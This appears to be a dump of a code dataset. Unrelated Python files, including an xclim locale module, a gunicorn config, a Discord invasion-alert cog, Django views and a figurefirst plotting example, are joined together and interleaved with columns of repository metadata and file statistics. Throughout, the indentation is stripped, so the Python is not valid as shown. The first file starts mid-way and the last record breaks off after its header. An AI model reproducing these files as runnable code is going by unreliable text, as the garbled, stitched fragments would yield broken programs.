]
def list_locales():
"""Return a list of available locales in xclim."""
locale_list = contents("xclim.data")
return [locale.split(".")[0] for locale in locale_list if locale.endswith(".json")]
def _valid_locales(locales):
return all(
[
(isinstance(locale, str) and get_best_locale(locale) is not None)
or (
not isinstance(locale, str)
and isinstance(locale[0], str)
and (Path(locale[1]).is_file() or isinstance(locale[1], dict))
)
for locale in locales
]
)
def get_best_locale(locale: str):
"""Get the best fitting available locale.
for existing locales : ['fr', 'fr-BE', 'en-US'],
'fr-CA' returns 'fr', 'en' -> 'en-US' and 'en-GB' -> 'en-US'.
Parameters
----------
locale : str
The requested locale, as an IETF language tag (lang or lang-territory)
Returns
-------
str or None:
The best available locale. None is none are available.
"""
available = list_locales()
if locale in available:
return locale
locale = locale.split("-")[0]
if locale in available:
return locale
if locale in [av.split("-")[0] for av in available]:
return [av for av in available if av.split("-")[0] == locale][0]
return None
def get_local_dict(locale: Union[str, Sequence[str], Tuple[str, dict]]):
"""Return all translated metadata for a given locale.
Parameters
----------
locale : str or sequence of str
IETF language tag or a tuple of the language tag and a translation dict, or
a tuple of the language tag and a path to a json file defining translation
of attributes.
Raises
------
UnavailableLocaleError
If the given locale is not available.
Returns
-------
str
The best fitting locale string
dict
The available translations in this locale.
"""
if isinstance(locale, str):
locale = get_best_locale(locale)
if locale is None:
raise UnavailableLocaleError(locale)
return (
locale,
json.load(open_text("xclim.data", f"{locale}.json")),
)
if isinstance(locale[1], dict):
return locale
with open(locale[1], encoding="utf-8") as locf:
return locale[0], json.load(locf)
def get_local_attrs(
indicator: str,
*locales: Union[str, Sequence[str], Tuple[str, dict]],
names: Optional[Sequence[str]] = None,
append_locale_name: bool = True,
) -> dict:
"""Get all attributes of an indicator in the requested locales.
Parameters
----------
indicator : str
Indicator's class name, usually the same as in `xc.core.indicator.registry`.
*locales : str
IETF language tag or a tuple of the language tag and a translation dict, or
a tuple of the language tag and a path to a json file defining translation
of attributes.
names : Optional[Sequence[str]]
If given, only returns translations of attributes in this list.
append_locale_name : bool
If True (default), append the language tag (as "{attr_name}_{locale}") to the
returned attributes.
Raises
------
ValueError
If `append_locale_name` is False and multiple `locales` are requested.
Returns
-------
dict
All CF attributes available for given indicator and locales.
Warns and returns an empty dict if none were available.
"""
if not append_locale_name and len(locales) > 1:
raise ValueError(
"`append_locale_name` cannot be False if multiple locales are requested."
)
attrs = {}
for locale in locales:
loc_name, loc_dict = get_local_dict(locale)
loc_name = f"_{loc_name}" if append_locale_name else ""
local_attrs = loc_dict.get(indicator)
if local_attrs is None:
warnings.warn(
f"Attributes of indicator {indicator} in language {locale} were requested, but none were found."
)
else:
for name in TRANSLATABLE_ATTRS:
if (names is None or name in names) and name in local_attrs:
attrs[f"{name}{loc_name}"] = local_attrs[name]
return attrs
def get_local_formatter(
locale: Union[str, Sequence[str], Tuple[str, dict]]
) -> AttrFormatter:
"""Return an AttrFormatter instance for the given locale.
Parameters
----------
locale : str or tuple of str
IETF language tag or a tuple of the language tag and a translation dict, or
a tuple of the language tag and a path to a json file defining translation
of attributes.
"""
loc_name, loc_dict = get_local_dict(locale)
attrs_mapping = loc_dict["attrs_mapping"].copy()
mods = attrs_mapping.pop("modifiers")
return AttrFormatter(attrs_mapping, mods)
class UnavailableLocaleError(ValueError):
"""Error raised when a locale is requested but doesn't exist."""
def __init__(self, locale):
super().__init__(
f"Locale {locale} not available. Use `xclim.core.locales.list_locales()` to see available languages."
)
def generate_local_dict(locale: str, init_english: bool = False):
"""Generate a dictionary with keys for each indicators and translatable attributes.
Parameters
----------
locale : str
Locale in the IETF format
init_english : bool
If True, fills the initial dictionary with the english versions of the attributes.
Defaults to False.
"""
from xclim.core.indicator import registry
best_locale = get_best_locale(locale)
if best_locale is not None:
locname, attrs = get_local_dict(best_locale)
for ind_name in attrs.copy().keys():
if ind_name != "attrs_mapping" and ind_name not in registry:
attrs.pop(ind_name)
else:
attrs = {}
attrs_mapping = attrs.setdefault("attrs_mapping", {})
attrs_mapping.setdefault("modifiers", [""])
for key, value in default_formatter.mapping.items():
attrs_mapping.setdefault(key, [value[0]])
eng_attr = ""
for ind_name, indicator in registry.items():
ind_attrs = attrs.setdefault(ind_name, {})
for translatable_attr in set(TRANSLATABLE_ATTRS).difference(
set(indicator._cf_names)
):
if init_english:
eng_attr = getattr(indicator, translatable_attr)
if not isinstance(eng_attr, str):
eng_attr = ""
ind_attrs.setdefault(f"{translatable_attr}", eng_attr)
for var_attrs in indicator.cf_attrs:
# In the case of single output, put var attrs in main dict
if len(indicator.cf_attrs) > 1:
ind_attrs = attrs.setdefault(f"{ind_name}.{var_attrs['var_name']}", {})
for translatable_attr in set(TRANSLATABLE_ATTRS).intersection(
set(indicator._cf_names)
):
if init_english:
eng_attr = var_attrs.get(translatable_attr)
if not isinstance(eng_attr, str):
eng_attr = ""
ind_attrs.setdefault(f"{translatable_attr}", eng_attr)
return attrs
| 35.582759
| 198
| 0.64609
| 293
| 0.028364
| 0
| 0
| 0
| 0
| 0
| 0
| 5,952
| 0.576186
|
b1784fe113bca2d558cd14a80d284029cd03a532
| 92
|
py
|
Python
|
tests/samples/importing/nested/base.py
|
machinable-org/machinable
|
9d96e942dde05d68699bc7bc0c3d062ee18652ad
|
[
"MIT"
] | 23
|
2020-02-28T14:29:04.000Z
|
2021-12-23T20:50:54.000Z
|
tests/samples/importing/nested/base.py
|
machinable-org/machinable
|
9d96e942dde05d68699bc7bc0c3d062ee18652ad
|
[
"MIT"
] | 172
|
2020-02-24T12:12:11.000Z
|
2022-03-29T03:08:24.000Z
|
tests/samples/importing/nested/base.py
|
machinable-org/machinable
|
9d96e942dde05d68699bc7bc0c3d062ee18652ad
|
[
"MIT"
] | 1
|
2020-11-23T22:42:20.000Z
|
2020-11-23T22:42:20.000Z
|
from machinable import Component
class BaseComponent(Component):
"""Base component"""
| 15.333333
| 32
| 0.75
| 56
| 0.608696
| 0
| 0
| 0
| 0
| 0
| 0
| 20
| 0.217391
|
b17898d3cc02bf7ea9e57ca3010adf0a3b3916ab
| 435
|
py
|
Python
|
source/blockchain_backup/config/gunicorn.conf.py
|
denova-com/blockchain-backup
|
a445bcbd67bd6485a4969dc1e24d51fbffc43cff
|
[
"OLDAP-2.6",
"OLDAP-2.4"
] | null | null | null |
source/blockchain_backup/config/gunicorn.conf.py
|
denova-com/blockchain-backup
|
a445bcbd67bd6485a4969dc1e24d51fbffc43cff
|
[
"OLDAP-2.6",
"OLDAP-2.4"
] | null | null | null |
source/blockchain_backup/config/gunicorn.conf.py
|
denova-com/blockchain-backup
|
a445bcbd67bd6485a4969dc1e24d51fbffc43cff
|
[
"OLDAP-2.6",
"OLDAP-2.4"
] | null | null | null |
# See
# The configuration file should be a valid Python source file with a python extension (e.g. gunicorn.conf.py).
# https://docs.gunicorn.org/en/stable/configure.html
bind='127.0.0.1:8962'
timeout=75
daemon=True
user='user'
accesslog='/var/local/log/user/blockchain_backup.gunicorn.access.log'
errorlog='/var/local/log/user/blockchain_backup.gunicorn.error.log'
log_level='debug'
capture_output=True
max_requests=3
workers=1
| 29
| 113
| 0.777011
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 319
| 0.733333
|
b1791920593f4e50adb1ee5900ad47f68783a7d1
| 211
|
py
|
Python
|
code_snippets/api-monitor-schedule-downtime.py
|
brettlangdon/documentation
|
87c23cb1d5e3e877bb37a19f7231b5d9239509dc
|
[
"BSD-3-Clause"
] | null | null | null |
code_snippets/api-monitor-schedule-downtime.py
|
brettlangdon/documentation
|
87c23cb1d5e3e877bb37a19f7231b5d9239509dc
|
[
"BSD-3-Clause"
] | null | null | null |
code_snippets/api-monitor-schedule-downtime.py
|
brettlangdon/documentation
|
87c23cb1d5e3e877bb37a19f7231b5d9239509dc
|
[
"BSD-3-Clause"
] | null | null | null |
from datadog import initialize, api
options = {
'api_key': 'api_key',
'app_key': 'app_key'
}
initialize(**options)
# Schedule downtime
api.Downtime.create(scope='env:staging', start=int(time.time()))
| 17.583333
| 64
| 0.691943
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 68
| 0.322275
|
b17998122b0c9414fb547e0a5c5bf8d5f8b4473a
| 63
|
py
|
Python
|
src/oscar/apps/customer/__init__.py
|
QueoLda/django-oscar
|
8dd992d82e31d26c929b3caa0e08b57e9701d097
|
[
"BSD-3-Clause"
] | 4,639
|
2015-01-01T00:42:33.000Z
|
2022-03-29T18:32:12.000Z
|
src/oscar/apps/customer/__init__.py
|
QueoLda/django-oscar
|
8dd992d82e31d26c929b3caa0e08b57e9701d097
|
[
"BSD-3-Clause"
] | 2,215
|
2015-01-02T22:32:51.000Z
|
2022-03-29T12:16:23.000Z
|
src/oscar/apps/customer/__init__.py
|
QueoLda/django-oscar
|
8dd992d82e31d26c929b3caa0e08b57e9701d097
|
[
"BSD-3-Clause"
] | 2,187
|
2015-01-02T06:33:31.000Z
|
2022-03-31T15:32:36.000Z
|
default_app_config = 'oscar.apps.customer.apps.CustomerConfig'
| 31.5
| 62
| 0.84127
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 41
| 0.650794
|
b179f01fa470edabbb25665461efb486ca6b1128
| 795
|
py
|
Python
|
modnotes/converters.py
|
jack1142/SinbadCogs-1
|
e0f24c0dbc3f845aa7a37ca96d00ee59494911ca
|
[
"BSD-Source-Code"
] | null | null | null |
modnotes/converters.py
|
jack1142/SinbadCogs-1
|
e0f24c0dbc3f845aa7a37ca96d00ee59494911ca
|
[
"BSD-Source-Code"
] | null | null | null |
modnotes/converters.py
|
jack1142/SinbadCogs-1
|
e0f24c0dbc3f845aa7a37ca96d00ee59494911ca
|
[
"BSD-Source-Code"
] | null | null | null |
import contextlib
import re
from typing import NamedTuple, Optional
import discord
from redbot.core.commands import BadArgument, Context, MemberConverter
_discord_member_converter_instance = MemberConverter()
_id_regex = re.compile(r"([0-9]{15,21})$")
_mention_regex = re.compile(r"<@!?([0-9]{15,21})>$")
class MemberOrID(NamedTuple):
member: Optional[discord.Member]
id: int
@classmethod
async def convert(cls, ctx: Context, argument: str):
with contextlib.suppress(Exception):
m = await _discord_member_converter_instance.convert(ctx, argument)
return cls(m, m.id)
match = _id_regex.match(argument) or _mention_regex.match(argument)
if match:
return cls(None, int(match.group(1)))
raise BadArgument()
| 27.413793
| 79
| 0.693082
| 485
| 0.610063
| 0
| 0
| 401
| 0.504403
| 384
| 0.483019
| 41
| 0.051572
|
b179ff426e1a26e74d3b6cc6592435b4bf9294c3
| 224
|
py
|
Python
|
face_api/admin.py
|
glen-s-abraham/face-detection-api
|
ce671a9750065c0fc82d0dd668299738f1c07508
|
[
"MIT"
] | null | null | null |
face_api/admin.py
|
glen-s-abraham/face-detection-api
|
ce671a9750065c0fc82d0dd668299738f1c07508
|
[
"MIT"
] | null | null | null |
face_api/admin.py
|
glen-s-abraham/face-detection-api
|
ce671a9750065c0fc82d0dd668299738f1c07508
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from face_api.models import KnowledgeDatabase
from face_api.models import ImageUploads
# Register your models here.
admin.site.register(KnowledgeDatabase)
admin.site.register(ImageUploads)
| 24.888889
| 45
| 0.848214
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 28
| 0.125
|
b17a29c0eb42919a5d5dc662a31db12c22531561
| 4,596
|
py
|
Python
|
plugins/base/views.py
|
adlerosn/corpusslayer
|
d3dea2e2d15e911d048a39f6ef6cb2d5f7b33e58
|
[
"MIT"
] | null | null | null |
plugins/base/views.py
|
adlerosn/corpusslayer
|
d3dea2e2d15e911d048a39f6ef6cb2d5f7b33e58
|
[
"MIT"
] | 1
|
2019-07-06T20:43:45.000Z
|
2019-07-06T20:43:45.000Z
|
plugins/base/views.py
|
adlerosn/corpusslayer
|
d3dea2e2d15e911d048a39f6ef6cb2d5f7b33e58
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2017 Adler Neves <adlerosn@gmail.com>
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os
pluginName = os.path.abspath(__file__).split(os.path.sep)[-2]
importline1 = 'import '+('.'.join(['plugins',pluginName,'models'])+' as models')
importline2 = 'import '+('.'.join(['plugins',pluginName,'forms'])+' as forms')
exec(importline1) #import plugins.thisplugin.models as models
exec(importline2) #import plugins.thisplugin.forms as forms
import application.forms as app_forms
import application.models as app_models
import application.business as app_ctrl
from django.utils.translation import ugettext_lazy as _
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.shortcuts import render
from django.views.generic import View
from django.views.generic import TemplateView
from django.template.response import TemplateResponse
from django.http import Http404
from django.urls import reverse
from django.core.paginator import Paginator
from urllib.parse import urlencode
from view.pages.views import SoonView, TemplateViewLoggedIn, UserPartEditFormView
from view.pages.views import CrudDeleteView, CrudEditView, CrudListView
import re
import json
import base64
def escapeRegex(s):
o = ''
for c in s:
if c in ',.+*?|^$[]{}()\\':
o+='\\'
o+=c
return o
def findFirstStringAtZero(el):
if isinstance(el,str):
return el
else:
return findFirstStringAtZero(el[0])
class MockRegexSeachWithIn:
def __init__(self, data):
self.data = data
def search(self, bigger):
if bigger.__contains__(self.data):
return True
return None
# Create your views here.
class DocumentView(TemplateViewLoggedIn):
template_name = 'plugins/base/document.html'
def get(self, request, corpus_pk='0', doc_pk='0'):
bl = app_ctrl.Business(request)
document = app_models.Document.objects.get(user__id=bl.user.id, corpus__pk=corpus_pk, pk=doc_pk)
corpus = document.corpus
return render(request, self.template_name, {
'corpus': corpus,
'document': document,
'textlines': document.text.strip().splitlines(),
})
class FinderView(TemplateViewLoggedIn):
template_name = 'plugins/base/finder.html'
def get(self, request, corpus_pk='0', fragment=''):
bl = app_ctrl.Business(request)
corpus = app_models.Corpus.objects.get(user__id=bl.user.id, pk=corpus_pk)
documents = corpus.documents.all()
wanted = json.loads(base64.b64decode(fragment).decode('utf-8'))
searched = None
if isinstance(wanted,str):
searched = escapeRegex(wanted.strip())
searched = searched.replace(' ','\\s*')
wanted = re.compile(searched)
else:
searched = '\\s*'.join(map(escapeRegex, map(findFirstStringAtZero, wanted)))
wanted = re.compile(searched)
matchedDocs = list()
for document in documents:
if wanted.search(document.text) is not None:
matchedDocs.append(document)
matchedDocs.sort(key=lambda a: a.title)
if len(matchedDocs)<=0:
raise Http404("Couldn't find any document with: "+searched)
if len(matchedDocs)==1:
return HttpResponseRedirect(reverse('base_document',None,[corpus_pk,matchedDocs[0].pk]))
return render(request, self.template_name, {
'query':searched,
'corpus':corpus,
'documents':matchedDocs,
})
| 38.3
| 104
| 0.698216
| 2,050
| 0.44604
| 0
| 0
| 0
| 0
| 0
| 0
| 1,512
| 0.328982
|
b17abbe2c8f968394190d9316ec3a085ca24ece7
| 197
|
py
|
Python
|
addons/stats/scripts/predictors/abstract_predictor.py
|
Kait-tt/tacowassa
|
7e71c6ef6b5f939a99a3600025b26d459ebc0233
|
[
"MIT"
] | null | null | null |
addons/stats/scripts/predictors/abstract_predictor.py
|
Kait-tt/tacowassa
|
7e71c6ef6b5f939a99a3600025b26d459ebc0233
|
[
"MIT"
] | 141
|
2016-08-23T03:44:17.000Z
|
2017-10-08T02:39:36.000Z
|
addons/stats/scripts/predictors/abstract_predictor.py
|
Kait-tt/tacowassa
|
7e71c6ef6b5f939a99a3600025b26d459ebc0233
|
[
"MIT"
] | 1
|
2019-04-05T15:19:43.000Z
|
2019-04-05T15:19:43.000Z
|
# coding:utf-8
from abc import ABCMeta, abstractmethod
class AbstractPredictor(metaclass=ABCMeta):
@classmethod
@abstractmethod
def predicate(cls, tasks, user_id, cost):
pass
| 19.7
| 45
| 0.720812
| 139
| 0.705584
| 0
| 0
| 91
| 0.461929
| 0
| 0
| 14
| 0.071066
|
b17ac66814a8b6950eb9f7e8278e334fa9498901
| 216
|
py
|
Python
|
day11/eqatri.py
|
nikhilsamninan/python-files
|
15198459081097058a939b40b5e8ef754e578fe0
|
[
"Apache-2.0"
] | null | null | null |
day11/eqatri.py
|
nikhilsamninan/python-files
|
15198459081097058a939b40b5e8ef754e578fe0
|
[
"Apache-2.0"
] | null | null | null |
day11/eqatri.py
|
nikhilsamninan/python-files
|
15198459081097058a939b40b5e8ef754e578fe0
|
[
"Apache-2.0"
] | null | null | null |
size = 5
m = (2 * size)-2
for i in range(0, size):
for j in range(0, m):
print(end=" ")
m = m - 1
for j in range(0, i + 1):
if(m%2!=0):
print("*", end=" ")
print("")
| 12.705882
| 31
| 0.388889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 11
| 0.050926
|
b17bb1524daf129418a0726643402df5cb23be6d
| 691
|
py
|
Python
|
tests/test_constants.py
|
9cat/dydx-v3-python
|
c222f3d0b1a870e63fcceaf19b42109c9558a6df
|
[
"Apache-2.0"
] | null | null | null |
tests/test_constants.py
|
9cat/dydx-v3-python
|
c222f3d0b1a870e63fcceaf19b42109c9558a6df
|
[
"Apache-2.0"
] | null | null | null |
tests/test_constants.py
|
9cat/dydx-v3-python
|
c222f3d0b1a870e63fcceaf19b42109c9558a6df
|
[
"Apache-2.0"
] | null | null | null |
from dydx3.constants import SYNTHETIC_ASSET_MAP, SYNTHETIC_ASSET_ID_MAP, ASSET_RESOLUTION, COLLATERAL_ASSET
class TestConstants():
def test_constants_have_regular_structure(self):
for market, asset in SYNTHETIC_ASSET_MAP.items():
market_parts = market.split('-')
base_token, quote_token = market_parts
assert base_token == asset
assert quote_token == 'USD'
assert len(market_parts) == 2
assert list(SYNTHETIC_ASSET_MAP.values()) == list(SYNTHETIC_ASSET_ID_MAP.keys())
assets = [x for x in ASSET_RESOLUTION.keys() if x != COLLATERAL_ASSET]
assert assets == list(SYNTHETIC_ASSET_MAP.values())
| 40.647059
| 107
| 0.688857
| 580
| 0.839363
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 0.011577
|
b17beb716bfd95140964574b9d48ea04c12d770d
| 5,802
|
py
|
Python
|
src/cogs/invasion.py
|
calsf/codex-prime
|
c651d4c2f34581babc8078d01fe84dc95f3b7c36
|
[
"MIT"
] | null | null | null |
src/cogs/invasion.py
|
calsf/codex-prime
|
c651d4c2f34581babc8078d01fe84dc95f3b7c36
|
[
"MIT"
] | null | null | null |
src/cogs/invasion.py
|
calsf/codex-prime
|
c651d4c2f34581babc8078d01fe84dc95f3b7c36
|
[
"MIT"
] | null | null | null |
#INVASION COMMANDS:
# !invasions // !atinvasions <reward> // !rminvasions
import discord
from discord.ext import commands
import asyncio
from src import sess
class Invasions(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.alert_dict = {} # user: reward, list of prev invasions with reward
@commands.Cog.listener()
async def on_ready(self):
print('Invasions Online')
# Periodically check
while True:
await asyncio.gather(self.check_invasions(50))
@commands.command()
async def invasions(self, ctx):
inv = await sess.request('invasions')
if inv == 0:
print("Could not retrieve data.")
return
embed = discord.Embed(title="Invasions")
# Organize invasions into description/type
inv_dict = {} # example: {GrineerOffensive: [{mission}, {mission}], }
for i in inv:
if not i['completed']: # Do not add invasions that have been completed
if i['desc'] in inv_dict:
inv_dict[i['desc']].append(i)
else:
inv_dict[i['desc']] = []
inv_dict[i['desc']].append(i)
# Show invasion information grouped via description/type
for key, li in inv_dict.items():
info = ''
for v in li:
node = v['node']
atk_reward = v['attackerReward']['asString'] or 'N/A'
def_reward = v['defenderReward']['asString'] or 'N/A'
attackers = v['attackingFaction']
defenders = v['defendingFaction']
info += node + ': \n' + attackers + f' [{atk_reward}]' + ' vs ' + defenders + f' [{def_reward}]\n'
embed.add_field(name=f'{key}', value=f'{info}', inline=False)
await ctx.send(embed=embed)
# Add user of command to the alert_dict to be alerted of invasions with specific reward
@commands.command()
async def atinvasions(self, ctx, *, reward=''):
try:
if not reward:
await ctx.send(ctx.message.author.mention + ' Enter an invasion reward to be alerted for.')
else:
self.alert_dict[ctx.message.author] = [reward, []]
await ctx.message.author.send(
f' You will now be alerted for invasions with a {reward.title()} reward.'
' To stop being alerted, use command "!rminvasions"')
except ValueError:
await ctx.message.author.send('Enter an invasion reward to be alerted for.')
# Remove user of command from the alert_dict to no longer be notified of invasion rewards
@commands.command()
async def rminvasions(self, ctx):
try:
self.alert_dict.pop(ctx.message.author)
await ctx.message.author.send('You are no longer being alerted for invasions.')
except KeyError:
await ctx.message.author.send('You are currently not being alerted.')
# THIS WILL BE PERIODICALLY CALLED on_ready
# Check for invasions with specific rewards for each user
async def check_invasions(self, delay):
# Wait before making request
await asyncio.sleep(delay)
inv = await sess.request('invasions')
if inv == 0:
print("Could not retrieve data.")
return
embed = discord.Embed(title="Invasions")
# Organize invasions into description/type
inv_dict = {} # example: {GrineerOffensive: [{mission}, {mission}], }
for i in inv:
if not i['completed']: # Do not add invasions that have been completed
if i['desc'] in inv_dict:
inv_dict[i['desc']].append(i)
else:
inv_dict[i['desc']] = []
inv_dict[i['desc']].append(i)
# Check each user's tracked reward and notify of any missions with their specific reward
for user in self.alert_dict.keys():
embed.clear_fields()
user_inv = []
for key, li in inv_dict.items():
info = ''
for v in li:
if self.alert_dict[user][0].lower() in v['attackerReward']['asString'].lower() \
or self.alert_dict[user][0].lower() in v['defenderReward']['asString'].lower():
user_inv.append(v)
node = v['node']
atk_reward = v['attackerReward']['asString'] or 'N/A'
def_reward = v['defenderReward']['asString'] or 'N/A'
attackers = v['attackingFaction']
defenders = v['defendingFaction']
info += node + ': \n' + attackers + f' [{atk_reward}]' + ' vs ' + defenders + f' [{def_reward}]\n'
if info != '':
embed.add_field(name=f'{key}', value=f'{info}', inline=False)
# Check if need to notify user
if len(self.alert_dict[user][1]) != len(user_inv): # If lengths do not match, alert of update
self.alert_dict[user][1] = user_inv.copy()
await user.send(f'Invasions with {self.alert_dict[user][0].title()} reward has been updated!',
embed=embed)
else:
for i in range(len(self.alert_dict[user][1])):
if self.alert_dict[user][1][i]['node'] != user_inv[i]['node']:
self.alert_dict[user][1] = user_inv.copy()
await user.send(f'Invasions with {self.alert_dict[user][0].title()} reward has been updated!',
embed=embed)
def setup(bot):
bot.add_cog(Invasions(bot))
| 42.977778
| 122
| 0.54757
| 5,588
| 0.963116
| 0
| 0
| 2,489
| 0.42899
| 4,998
| 0.861427
| 2,006
| 0.345743
|
b17cbc82703ac9fc882cd99a409335fa53853226
| 226
|
py
|
Python
|
samples-python/datalayer.calc/calculations/__init__.py
|
bracoe/ctrlx-automation-sdk
|
6b2e61e146c557488125baf941e4d64c6fa6d0fb
|
[
"MIT"
] | 16
|
2021-08-23T13:07:12.000Z
|
2022-02-21T13:29:21.000Z
|
samples-python/datalayer.calc/calculations/__init__.py
|
bracoe/ctrlx-automation-sdk
|
6b2e61e146c557488125baf941e4d64c6fa6d0fb
|
[
"MIT"
] | null | null | null |
samples-python/datalayer.calc/calculations/__init__.py
|
bracoe/ctrlx-automation-sdk
|
6b2e61e146c557488125baf941e4d64c6fa6d0fb
|
[
"MIT"
] | 10
|
2021-09-29T09:58:33.000Z
|
2022-01-13T07:20:00.000Z
|
__version__ = '2.0.0'
__description__ = 'Sample for calculations with data from the ctrlX Data Layer'
__author__ = 'Fantastic Python Developers'
__licence__ = 'MIT License'
__copyright__ = 'Copyright (c) 2021 Bosch Rexroth AG'
| 45.2
| 79
| 0.778761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 147
| 0.650442
|
b17e60242b5d5da25f1f85bc29429ee00fd48f19
| 320
|
py
|
Python
|
sqlalchemist/models/definitions.py
|
pmav99/sqlalchemist
|
af784f8d6e7c6c7298ad273c481af748cc0332d5
|
[
"BSD-3-Clause"
] | 7
|
2019-09-06T21:58:42.000Z
|
2021-12-02T21:48:35.000Z
|
sqlalchemist/models/definitions.py
|
pmav99/sqlalchemy_playground
|
af784f8d6e7c6c7298ad273c481af748cc0332d5
|
[
"BSD-3-Clause"
] | null | null | null |
sqlalchemist/models/definitions.py
|
pmav99/sqlalchemy_playground
|
af784f8d6e7c6c7298ad273c481af748cc0332d5
|
[
"BSD-3-Clause"
] | 1
|
2021-01-22T03:23:21.000Z
|
2021-01-22T03:23:21.000Z
|
import sqlalchemy as sa
from .meta import Base
class Person(Base):
__tablename__ = "person"
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.String)
date_of_birth = sa.Column(sa.Date)
height = sa.Column(sa.Integer)
weight = sa.Column(sa.Numeric)
__all__ = [
"Person",
]
| 16.842105
| 48
| 0.6625
| 239
| 0.746875
| 0
| 0
| 0
| 0
| 0
| 0
| 16
| 0.05
|
b17eab4940677c2202b0aa8a880f82fca874b795
| 2,732
|
py
|
Python
|
examples/example_hello_world.py
|
clbarnes/figurefirst
|
ed38e246a96f28530bf663eb6920da1c3ccee610
|
[
"MIT"
] | 67
|
2016-06-03T20:37:56.000Z
|
2022-03-08T19:05:06.000Z
|
examples/example_hello_world.py
|
clbarnes/figurefirst
|
ed38e246a96f28530bf663eb6920da1c3ccee610
|
[
"MIT"
] | 56
|
2016-05-23T17:44:04.000Z
|
2021-11-18T19:23:52.000Z
|
examples/example_hello_world.py
|
clbarnes/figurefirst
|
ed38e246a96f28530bf663eb6920da1c3ccee610
|
[
"MIT"
] | 11
|
2017-07-13T14:25:08.000Z
|
2021-12-01T00:15:01.000Z
|
#!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
plt.ion()
from figurefirst import FigureLayout
layout = FigureLayout('example_hello_world_layout.svg')
layout.make_mplfigures()
d = np.array([[144, 57], [138, 57], [138, 59], [141, 61], [141, 82], [138, 84], [138, 85], [142, 85], [147, 85], [147, 84], [144, 82], [144, 57], [144, 57], [155, 57], [149, 57], [149, 59], [152, 61], [152, 82], [149, 84], [149, 85], [153, 85], [158, 85], [158, 84], [155, 82], [155, 57], [155, 57], [273, 57], [267, 57], [267, 59], [270, 61], [270, 82], [267, 84], [267, 85], [271, 85], [276, 85], [276, 84], [273, 82], [273, 57], [273, 57], [295, 57], [289, 57], [289, 59], [292, 61], [292, 70], [287, 67], [278, 76], [287, 85], [292, 83], [292, 85], [298, 85], [298, 84], [295, 81], [295, 57], [295, 57], [90, 57], [90, 59], [91, 59], [94, 61], [94, 82], [91, 84], [90, 84], [90, 85], [96, 85], [102, 85], [102, 84], [101, 84], [98, 82], [98, 71], [110, 71], [110, 82], [107, 84], [106, 84], [106, 85], [112, 85], [118, 85], [118, 84], [117, 84], [113, 82], [113, 61], [117, 59], [118, 59], [118, 57], [112, 58], [106, 57], [106, 59], [107, 59], [110, 61], [110, 70], [98, 70], [98, 61], [101, 59], [102, 59], [102, 57], [96, 58], [90, 57], [90, 57], [193, 57], [193, 59], [197, 60], [205, 85], [205, 86], [206, 85], [213, 65], [219, 85], [220, 86], [221, 85], [229, 61], [233, 59], [233, 57], [229, 58], [224, 57], [224, 59], [228, 61], [227, 62], [221, 80], [215, 60], [215, 60], [218, 59], [218, 57], [213, 58], [208, 57], [208, 59], [211, 60], [212, 63], [207, 80], [200, 60], [200, 60], [203, 59], [203, 57], [198, 58], [193, 57], [193, 57], [128, 67], [120, 76], [129, 85], [135, 80], [135, 80], [134, 80], [129, 84], [125, 82], [123, 76], [134, 76], [135, 75], [128, 67], [128, 67], [169, 67], [160, 76], [169, 85], [178, 76], [169, 67], [169, 67], [240, 67], [231, 76], [240, 85], [249, 76], [240, 67], [240, 67], [257, 67], [251, 68], [251, 69], [254, 71], [254, 82], [251, 84], [251, 85], [256, 85], [261, 85], [261, 84], [260, 84], [257, 82], [257, 75], [262, 68], [262, 68], [261, 70], [263, 71], [265, 70], [262, 67], [257, 71], [257, 67], [257, 67], [128, 68], [133, 75], [123, 75], [128, 68], [128, 68], [169, 68], [173, 70], [174, 76], [173, 81], [169, 84], [164, 82], [163, 76], [164, 70], [169, 68], [169, 68], [240, 68], [244, 70], [246, 76], [245, 81], [240, 84], [235, 82], [234, 76], [235, 70], [240, 68], [240, 68], [287, 68], [292, 70], [292, 72], [292, 80], [292, 82], [287, 84], [283, 82], [281, 76], [283, 71], [287, 68], [287, 68]])
ax = layout.axes['ax_name']['axis']
ax.plot(d[:,0], -d[:,1], lw=4)
layout.insert_figures('target_layer_name')
layout.write_svg('example_hello_world_output.svg')
| 143.789474
| 2,363
| 0.493411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 119
| 0.043558
|
b17fee2e7308f25f04ee5daea15a5c921b98ff99
| 2,009
|
py
|
Python
|
cifar_exps/metric/local_config.py
|
maestrojeong/Deep-Hash-Table-ICML18-
|
0c7efa230f950d5a2cd1928ac9f5d99f4276d2b5
|
[
"MIT"
] | 70
|
2018-06-03T04:19:13.000Z
|
2021-11-08T10:40:46.000Z
|
cifar_exps/metric/local_config.py
|
maestrojeong/Deep-Hash-Table-ICML18-
|
0c7efa230f950d5a2cd1928ac9f5d99f4276d2b5
|
[
"MIT"
] | null | null | null |
cifar_exps/metric/local_config.py
|
